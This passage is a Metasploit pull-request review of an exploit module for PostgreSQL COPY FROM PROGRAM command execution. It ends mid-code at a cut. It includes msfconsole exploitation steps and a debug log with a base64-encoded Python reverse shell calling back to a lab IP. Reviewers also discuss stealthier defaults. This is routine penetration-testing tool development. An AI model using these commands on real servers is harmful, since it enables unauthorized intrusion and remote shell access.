Adding new Postgres_cmd_execution module
rapid7/metasploit-framework pull request #11598
Opened 2019-03-20 17:49 UTC by Greenwolf

PostgreSQL from 9.3 to latest has functionality allowing the database superuser & users in the 'pg_read_server_files' group to execute OS commands. 

Explanation:
https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

This is my first run through of a Metasploit module so I would appreciate anyone helping me clean it up. It currently works on OSX & Linux by providing a cmd stager (like cmd/unix/reverse_perl), and on windows by first starting up a PowerShell download cradle, then putting the command in the COMMAND parameter. It feels a little hacky though 😁

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] use exploit/multi/postgres/postgres_cmd_execution_nine_three
- [ ] set RHOST target.ip.add.ress
- [ ] set payload cmd/unix/reverse_perl
- [ ] set PASSWORD postgres
- [ ] set USERNAME postgres
- [ ] set DATABASE postgres
- [ ] set LHOST my.ip.add.ress
- [ ] set LHOST myport
- [ ] exploit

2019-03-21 00:35 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +    if version[:auth]
Consider using a guard clause.

```ruby
return false unless version[:auth]
```

2019-03-21 00:35 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +    successful_exploit = execute_payload
This variable declaration is unnecessary. Also, the conditional logic usually has the positive branch first.

Consider:

```ruby
    if execute_payload
      print_status("Exploit Succeeded")
    else
      print_status("Exploit Failed")
    end
```

2019-03-21 00:35 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +      Exploit::CheckCode::Appears
`Exploit::` class prefix is redundant in this context. If you wanted, this method could be golfed further:

```ruby
  def check
    vuln_version? ? CheckCode::Appears : CheckCode::Safe
  end
```

2019-03-21 00:35 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +      'DisclosureDate' => 'Feb 24 2019'
This is usually the date the technique was published, or the date the vulnerable functionality was introduced.

2019-03-21 00:35 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +        ['URL', '<Blogpost on the subject>'],
.

2019-03-21 04:28 UTC, bcoles commented
Please run `./tools/dev/msftidy.rb modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb` on this module and resolve the following issues:

```
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [INFO] No CVE references found. Please check before you land!
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [ERROR] '>' is a bad character in module title.
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:19 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:20 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:23 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:26 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:30 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:65 - [WARNING] Please use snake case on method names: def tablename; datastore['TABLENAME']; end 
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:69 - [WARNING] Please use snake case on method names: def command; datastore['COMMAND']; end 
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:100 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:104 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:126 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb:144 - [WARNING] Spaces at EOL
modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb - [WARNING] Please add a newline at the end of the file
------------------------------------------------------------------------
```

2019-03-21 04:28 UTC, bcoles commented
Please add some module [documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation) for this module.

* [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
* [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)

2019-03-21 10:08 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +    if version[:auth]
Fixed

2019-03-21 10:08 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +    successful_exploit = execute_payload
Fixed

2019-03-21 10:08 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +      Exploit::CheckCode::Appears
Fixed

2019-03-21 10:09 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +      'DisclosureDate' => 'Feb 24 2019'
Fixed

2019-03-21 10:23 UTC, Greenwolf commented
Hi @bcoles, Thank you for all your tips and advice, i've implemented all the fixes you requested to the code in my branch. I'm having an issue with this last tidy option though:

$ ./tools/dev/msftidy.rb ~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb
~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb - [WARNING] Unexpected and potentially incorrect super class found ('Msf::Exploit::Remote')

Do you know why it would be saying it's a potentially incorrect super class?

I'll just work on that documentation now.

2019-03-21 10:59 UTC, bcoles commented
> Do you know why it would be saying it's a potentially incorrect super class?

`msftidy` is confused because the module path `~/Desktop/postgres-cmd-execution/post_gres_bcole_fixes.rb` is located outside of the framework.

`@module_type` is defined based on the path:

```ruby
@module_type = File.dirname(File.expand_path(@full_filepath))[/\/modules\/([^\/]+)/, 1]
```

Later:

```ruby
    if prefix_super_map.key?(@module_type)
      unless super_class =~ prefix_super_map[@module_type]
        error("Invalid super class for #{@module_type} module (found '#{super_class}', expected something like #{prefix_super_map[@module_type]}")
      end
    else
      warn("Unexpected and potentially incorrect super class found ('#{super_class}')")
    end

```

2019-03-21 11:00 UTC, Greenwolf commented
Ah ok, so i guess that one isn't an issue once it's merged in. I've also created the documentation you requested. Let me know if you need anything else?

2019-03-21 11:01 UTC, bcoles commented
The module name should describe the vulnerable functionality. I haven't read your blog post yet (nor this PR code), but presumable something like `PostgreSQL pg_read_server_files Command Execution` would be suitable. You might be able to come up with something better,

The module file name should match the module name, ie `postgres_pg_read_server_files_cmd_exec`.

2019-03-21 11:02 UTC, bcoles commented
> Ah ok, so i guess that one isn't an issue once it's merged in.

`msftidy` is run as part of the automated Travis CI tests. It won't be confused, because the file is located at the correct path.

2019-03-21 11:03 UTC, Greenwolf commented
Well its anyone in the pg_read_server_files group + superusers, i think superusers will be more common though. The flaw is that Postgres has a COPY TO/FROM PROGRAM function, similar to xp_cmdshell, so i'll do something around that

2019-03-21 11:05 UTC, Greenwolf commented
How about:
postgres_copy_from_program_cmd_exec

2019-03-21 11:09 UTC, Greenwolf commented
I also added you to authors for your assistance:
        'bcoles' # metasploit module assistance

2019-03-21 11:12 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +  def vuln_version?
This method could be reduced significantly by implemented version parsing using `Gem::Version`:

```ruby
  def vuln_version?
    if Gem::Version.new(version_full) >= Gem::Version.new('9.3')
      return true
    else
      return false
    end
  end
```

Is there any way to perform a capability check, to confirm whether the "vulnerability" is "exploitable" without relying on the version?

2019-03-21 11:24 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +  def vuln_version?
You would either have to exploit it to see if you can execute commands if you weren't doing it based off version.

2019-03-21 11:25 UTC, bcoles commented
> 
> 
> I also added you to authors for your assistance:
> 'bcoles' # metasploit module assistance

Thanks, but please remove. I haven't done anything.

Also, I probably won't have time to review, test and land this PR. Someone else will take over.

2019-03-21 18:13 UTC, Greenwolf commented
Done, does everything look good so far though? I applied all your changes.

2019-03-22 01:09 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +        'PayloadType' => %w(cmd)
```suggestion
      'PayloadType' => 'cmd',
```

2019-03-22 16:18 UTC, bcoles commented
> 
> 
> Done, does everything look good so far though? I applied all your changes. Not sure why the travis-ci continuous integration is failing though.

It was failing due to a syntax error. It's fixed now.

(You can view the Travis CI output by selecting `Show all checks`, then `Details` next to `continuous-integration/travis-ci/pr`)

2019-03-22 16:20 UTC, Greenwolf commented
Excellent, what needs to happen now for the merge?

2019-03-22 16:26 UTC, bcoles commented
> 
> 
> Excellent, what needs to happen now for the merge?

Probably some waiting. Eventually, someone will:

* read the module code and associated documentation in this PR,
* test the module,
* (optionally) suggest changes,
* (optionally) wait for you to implement the changes,

Then rinse and repeat until everyone is happy.

2019-03-22 22:44 UTC, wvu-r7 commented
Hey, @Greenwolf. I saw your blog post via Twitter, and I think it's great you took advantage of this functionality in Postgres. I'll happily take this over, since @bcoles did the hard work already. :-)

2019-03-22 23:06 UTC, Greenwolf commented
Awesome thanks @wvu-r7! Just let me know if you need anything

2019-03-23 18:13 UTC, wvu-r7 commented
I'll probably get to this on Monday. Busy weekend.

It's curious to me that CVE-2019–9193 was assigned _six years_ after `COPY TO/FROM PROGRAM` was implemented in Postgres 9.3. The behavior has certainly been abused since its inception.

I remember having a chuckle at the fact that Postgres had basically implemented `xp_cmdshell` for free. Moreover, I'm surprised it took this long for a Metasploit module to appear!

Great work, and I'm looking forward to getting this spruced up and landed this coming week!

2019-03-24 05:30 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +  def execute_payload()
```suggestion
  def execute_payload
```

2019-03-24 05:30 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
It should work. If it doesn't, then perhaps there's something wrong with the version detection?

This check and the `logic_success?` check should also be moved before `print_status("Exploiting...")`

2019-03-24 05:30 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
This could probably be removed.

There are generic command execution payloads `cmd/windows/generic` and `cmd/unix/generic` which can be used, and take advantage of all the builtin conveniences of Metasploit, in particular the payload encoding.

@wvu-r7 to confirm.

Alternatively, the traditional approach is to have more than one `target` such as `Auto` and `Command`.

2019-03-24 05:30 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +        For Linux & OSX systems, cmd stagers are used such as: cmd/unix/reverse_perl
These aren't command stagers, they're regular payloads.

See comments below regarding using standard cmd payloads, rather than a separate `command` module option.

2019-03-24 05:30 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('TABLENAME', [ true, 'A table name that doesnt exist(To avoid deletion)', 'msftesttable']),
Given that the user has `pg_read_server_files` privileges, they can probably also create tables (?)

Perhaps a better approach would be to generate a random table name (one less easily identifiable than `msfttesttable`, and throw an error if the table already exists. The module could expose an advanced option to proceed anyway, allowing overwriting of existing tables (off by default).

2019-03-24 05:30 UTC, bcoles commented on documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md
> +   ![Image Not Found](https://cdn-images-1.medium.com/max/1600/1*G0E4YMdLA59lDsDm38Ce-g.png)
I would prefer raw text over images. It's easier to update and search.

If images are used, I would prefer they are under msf control, in the event that you or someone at medium[.]com thinks it would be hilarious to replace them with objectionable content or a libpng exploit.

Tagging @h00die , the documentation overlord, to weigh in here.

2019-03-24 05:30 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_cmd_execution_nine_three.rb
> +  def vuln_version?
Using `Gem::Version` would likely result in more readable code.

2019-03-24 15:36 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +        For Linux & OSX systems, cmd stagers are used such as: cmd/unix/reverse_perl
Resolved

2019-03-24 15:37 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
Resolved by moving exploiting to afterwards, issue with vuln_version not working is outstanding.

2019-03-24 15:40 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
The issue with this is that the users postgres runs with on windows, NT/AUTHORITY NETWORK SERVICE, doesn't appear to have any write permissions, so the cmd/windows/generic bat file doesn't work. Also it's less likely for windows to have perl/ruby available, whereas powershell is pretty much always possible. For this reason I made the descision to have a COMMAND variable to clearly show that on windows you should use a powershell web delivery. 

We could change this if there is a pay to automatically use web_delivery module as a 'set payload' option?

2019-03-24 15:44 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('TABLENAME', [ true, 'A table name that doesnt exist(To avoid deletion)', 'msftesttable']),
Wouldn't it be better to leave in an identifier by default, to help the blue team? Its currently easy to change if you want to be a bit more stealthy?

2019-03-24 16:05 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('TABLENAME', [ true, 'A table name that doesnt exist(To avoid deletion)', 'msftesttable']),
Helping the blue team is not part of the Metasploit mission statement.

2019-03-24 16:41 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
Does the `check` method work? If so, it's strange that `vuln_version?` does not work.

2019-03-24 16:50 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
There's a few things going on here. Also, some confusion over terminology.

By specifying the `PayloadType` as `cmd`, you're informing Metasploit that the payloads to be used are `cmd` payloads, which allows the user to select `cmd` payloads. There are many `cmd` payloads across all platforms. This includes `cmd/windows/powershell_bind_tcp` and `cmd/windows/powershell_reverse_tcp` payloads. This also includes `cmd/<platform>/generic` payloads, which are generic payloads allowing the user to specify arbitrary operating system command(s) to execute, in the `CMD` option, such as the commands you generated using `web_delivery`.

> We could change this if there is a pay to automatically use web_delivery module as a 'set payload' option?

This is effectively what happens when the user selects `cmd/windows/powershell_bind_tcp` or `cmd/windows/powershell_reverse_tcp` payloads; however, these are performed in memory, rather than downloading and executing an executable binary payload.

An alternative is to implement a command stager. A command stager uses one or many operating system commands to write a file to disk, then execute it. I'm sure @wvu-r7 will be happy to elaborate further.

2019-03-24 16:59 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
I took a quick look at this. It appears that PostgreSQL does not want to relinquish it's version information without an authenticated session.

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > rcheck 
[*] Reloading module...
{:unknown=>"Mpassword authentication failed for user \"postgres\":Fauth.c:L328"}
[*] 127.0.0.1:5432 - The target is not exploitable.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set username msf
username => msf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set password msf
password => msf
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > check

[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'select version()'
{:auth=>"PostgreSQL 10.4 (Debian 10.4-2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 7.3.0-18) 7.3.0, 64-bit"}
[-] Check failed: NoMethodError undefined method `[]' for nil:NilClass
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > 
```

The version format on my system is totally different, causing the `nil:NilClass`

2019-03-24 17:18 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      print_warning "#{peer} - Unable to execute query: #{query}"
Here's an additional error message, indicating that the user has insufficient permissions.

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > rexploit 
[*] Reloading module...

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 - 127.0.0.1:5432 - PostgreSQL 10.4 (Debian 10.4-2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 7.3.0-18) 7.3.0, 64-bit
[*] 127.0.0.1:5432 - Exploiting...
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'DROP TABLE IF EXISTS msftesttable;'
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - msftesttable dropped successfully
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'CREATE TABLE msftesttable(filename text);'
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - msftesttable created successfully
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'COPY msftesttable FROM PROGRAM 'python -c "exec(''aW1wb3J0IHNvY2tldCAgLCAgIHN1YnByb2Nlc3MgICwgICBvcyAgICA7aG9zdD0iMTcyLjE2LjE5MS4xNjUiICAgIDtwb3J0PTQ0NDQgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgO3MuY29ubmVjdCgoaG9zdCAgLCAgIHBvcnQpKSAgICA7b3MuZHVwMihzLmZpbGVubygpICAsICAgMCkgICAgO29zLmR1cDIocy5maWxlbm8oKSAgLCAgIDEpICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICwgICAyKSAgICA7cD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp''.decode(''base64''))"';'
{:sql_error=>"VERROR SQL statement 'COPY msftesttable FROM PROGRAM 'python -c \"exec(''aW1wb3J0IHNvY2tldCAgLCAgIHN1YnByb2Nlc3MgICwgICBvcyAgICA7aG9zdD0iMTcyLjE2LjE5MS4xNjUiICAgIDtwb3J0PTQ0NDQgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgO3MuY29ubmVjdCgoaG9zdCAgLCAgIHBvcnQpKSAgICA7b3MuZHVwMihzLmZpbGVubygpICAsICAgMCkgICAgO29zLmR1cDIocy5maWxlbm8oKSAgLCAgIDEpICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICwgICAyKSAgICA7cD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp''.decode(''base64''))\"';' returns #<RuntimeError: ERROR\tVERROR\tC42501\tMmust be superuser to COPY to or from an external program\tHAnyone can COPY to stdout or from stdin. psql's \\copy command also works for anyone.\tFcopy.c\tL802\tRDoCopy>"}
[!] 127.0.0.1:5432 - 127.0.0.1:5432 - Unable to execute query: COPY msftesttable FROM PROGRAM 'python -c "exec(''aW1wb3J0IHNvY2tldCAgLCAgIHN1YnByb2Nlc3MgICwgICBvcyAgICA7aG9zdD0iMTcyLjE2LjE5MS4xNjUiICAgIDtwb3J0PTQ0NDQgICAgO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCAgLCAgIHNvY2tldC5TT0NLX1NUUkVBTSkgICAgO3MuY29ubmVjdCgoaG9zdCAgLCAgIHBvcnQpKSAgICA7b3MuZHVwMihzLmZpbGVubygpICAsICAgMCkgICAgO29zLmR1cDIocy5maWxlbm8oKSAgLCAgIDEpICAgIDtvcy5kdXAyKHMuZmlsZW5vKCkgICwgICAyKSAgICA7cD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp''.decode(''base64''))"';
[*] 127.0.0.1:5432 - Exploit Failed
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - Disconnected
[*] Exploit completed, but no session was created.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > 
```

```suggestion
      if copy_query[:sql_error] =~ /must be superuser to COPY to or from an external program/
        print_error 'Insufficient permissions'
        return false
      end
      print_warning "#{peer} - Unable to execute query: #{query}"
```

2019-03-24 18:11 UTC, Greenwolf commented on documentation/modules/exploit/multi/postgres/postgres_copy_from_program_cmd_exec.md
> +   ![Image Not Found](https://cdn-images-1.medium.com/max/1600/1*G0E4YMdLA59lDsDm38Ce-g.png)
Resolved

2019-03-24 18:14 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('TABLENAME', [ true, 'A table name that doesnt exist(To avoid deletion)', 'msftesttable']),
That sound like a good compromise to me @bcoles, are you able to commit that change?

2019-03-24 18:18 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      print_warning "#{peer} - Unable to execute query: #{query}"
Resolved & expanded on the Insufficient permissions message.

2019-03-24 18:39 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
Ah yes i understand you now, i didn't realise there were reverse powershell cmd payloads! You learn something new every day! I agree then, I think the best way to approach this would be to select either Windows or Linux from targets, then suggest the perl shell for linux and powershell for Windows. We could leave the COMMAND variable as an option however for if the user wants to use a custom command? I'm not sure the convention to do this however?

2019-03-24 18:42 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
Shall i just remove these line?

2019-03-24 19:03 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
> We could leave the COMMAND variable as an option however for if the user wants to use a custom command?

The `cmd/<platform>/generic` payloads exist for this purpose. The user can specify a command to execute using the `CMD` payload option.

2019-03-24 19:07 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('TABLENAME', [ true, 'A table name that doesnt exist(To avoid deletion)', 'msftesttable']),
Something like this:

```suggestion
      OptString.new('TABLENAME', [ true, 'A table name that does not exist (To avoid deletion)', Rex::Text.rand_text_alphanumeric(8..12)]),
```

2019-03-24 19:34 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
Do you have a reference to how to set this up?

2019-03-24 19:56 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
> 
> 
> Do you have a reference to how to set this up?

You're already doing it. It's done. `COMMAND` is redundant. The user can specify a command to execute by using the appropriate `cmd/<platform>/generic` payload and the `CMD` payload option.

```
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > options

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMAND                     no        Send a custom command instead of a payload, use with powershell web delivery against windows
   DATABASE   template1        yes       The database to authenticate against
   PASSWORD   msf              no        The password for the specified username. Leave blank for a random password.
   RHOSTS     127.0.0.1        yes       The target address range or CIDR identifier
   RPORT      5432             yes       The target port (TCP)
   TABLENAME  msftesttable     yes       A table name that doesnt exist(To avoid deletion)
   USERNAME   msf              yes       The username to authenticate as


Payload options (cmd/unix/generic):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD                    yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set CMD lolol
CMD => lolol
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'select version()'
[*] 127.0.0.1:5432 - 127.0.0.1:5432 - PostgreSQL 10.4 (Debian 10.4-2) on x86_64-pc-linux-gnu, compiled by gcc (Debian 7.3.0-18) 7.3.0, 64-bit
[*] 127.0.0.1:5432 - Exploiting...
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'DROP TABLE IF EXISTS msftesttable;'
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - msftesttable dropped successfully
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'CREATE TABLE msftesttable(filename text);'
[+] 127.0.0.1:5432 - 127.0.0.1:5432 - msftesttable created successfully
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - querying with 'COPY msftesttable FROM PROGRAM 'lolol';'
VERROR SQL statement 'COPY msftesttable FROM PROGRAM 'lolol';' returns #<RuntimeError: ERROR	VERROR	C42501	Mmust be superuser to COPY to or from an external program	HAnyone can COPY to stdout or from stdin. psql's \copy command also works for anyone.	Fcopy.c	L802	RDoCopy>
[!] 127.0.0.1:5432 - 127.0.0.1:5432 - Unable to execute query: COPY msftesttable FROM PROGRAM 'lolol';
[*] 127.0.0.1:5432 - Exploit Failed
[*] 127.0.0.1:5432 - 127.0.0.1:5432 Postgres - Disconnected
[*] Exploit completed, but no session was created.
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > 
```

2019-03-24 20:02 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
Oh right, the targets. Something like this:

```ruby
      'Targets'        =>
        [
          [ 'Automatic', { } ],  # if you can implement auto OS detection that would be cool, otherwise remove this
          [
            'Unix/OSX/Linux', {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Payload' => 'cmd/unix/reverse_perl' } ],
          [
            'Windows', {
              'Platform' => 'windows',
              'Arch' => ARCH_CMD,
              'Payload' => 'cmd/windows/powershell_reverse_tcp' } ]
        ],
```

The Hash keys are pretty much the same as the module options you're already using (payload, badchars, etc)

2019-03-24 20:04 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
Note that unless you implement automatic targeting, the `'DefaultTarget' => 0` setting should be removed from the module, otherwise it will default to the first target, which will be confusing for end users targeting windows.

2019-03-24 20:12 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
That won't solve the problem. The version detection is broken, which means the `check` method is also broken.

I realise you copied the version detection from the other PostgreSQL module, but it's broken too.

Does the `version[:auth]` response string start with `PostgreSQL` on your system? If so, i's possible that the regex could be updated to:

```ruby
version_full = version[:auth].to_s.scan(/^PostgreSQL ([\d\.]+)/).flatten.first
```

That's much easier to read than the existing implementation. It would also allow removal of multiple lines of code, and will also work with `Gem::Version.new` for significantly easier version comparison.

2019-03-24 20:20 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
Here's some example code from [modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb) :

```ruby
      'Targets'            => [
        ['Unix In-Memory',
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Type'           => :unix_memory,
          'DefaultOptions' => {
            'PAYLOAD'      => 'cmd/unix/generic'
          }
        ],
        ['Linux Dropper',
          'Platform'       => 'linux',
          'Arch'           => ARCH_MIPSLE,
          'Type'           => :linux_dropper,
          'DefaultOptions' => {
            'PAYLOAD'      => 'linux/mipsle/meterpreter_reverse_tcp'
          }
        ]
      ],
```

This particular example differentiates between a `CMD` payload and a command stager, but the same principles apply.

2019-03-24 22:46 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
Should be resolved, removed the automatic targeted though

2019-03-24 22:47 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
`'DefaultTarget' => 0,` should also be removed.

2019-03-24 23:32 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +    #return unless vuln_version?
#11629

2019-03-24 23:35 UTC, Greenwolf commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
I've removed DefaultTarget, but can we leave COMMAND. It's easier to use that setting a payload just to assign a command there. I didn't even know about cmd/X/generic and setting a command before today!

2019-03-25 00:09 UTC, bcoles commented on modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
> +      OptString.new('COMMAND', [ false, 'Send a custom command instead of a payload, use with powershell web delivery against windows', ''])
I don't see any harm in leaving it, but it's not consistent with the framework. I'll leave it to @wvu-r7 to decide.

If you want to offer a `COMMAND` option, the traditional approach is to add separate targets:

```ruby
        ['Unix (In-Memory)',
          'Platform'   => 'unix',
          'Arch'       => ARCH_CMD
        ],
        ['Python (In-Memory)',
          'Platform'   => 'python',
          'Arch'       => ARCH_PYTHON
        ],
        ['PowerShell (In-Memory)',
          'Platform'   => 'win',
          'Arch'       => [ARCH_X86, ARCH_X64]
        ],
        ['Windows (CMD)',
          'Platform'   => 'win',
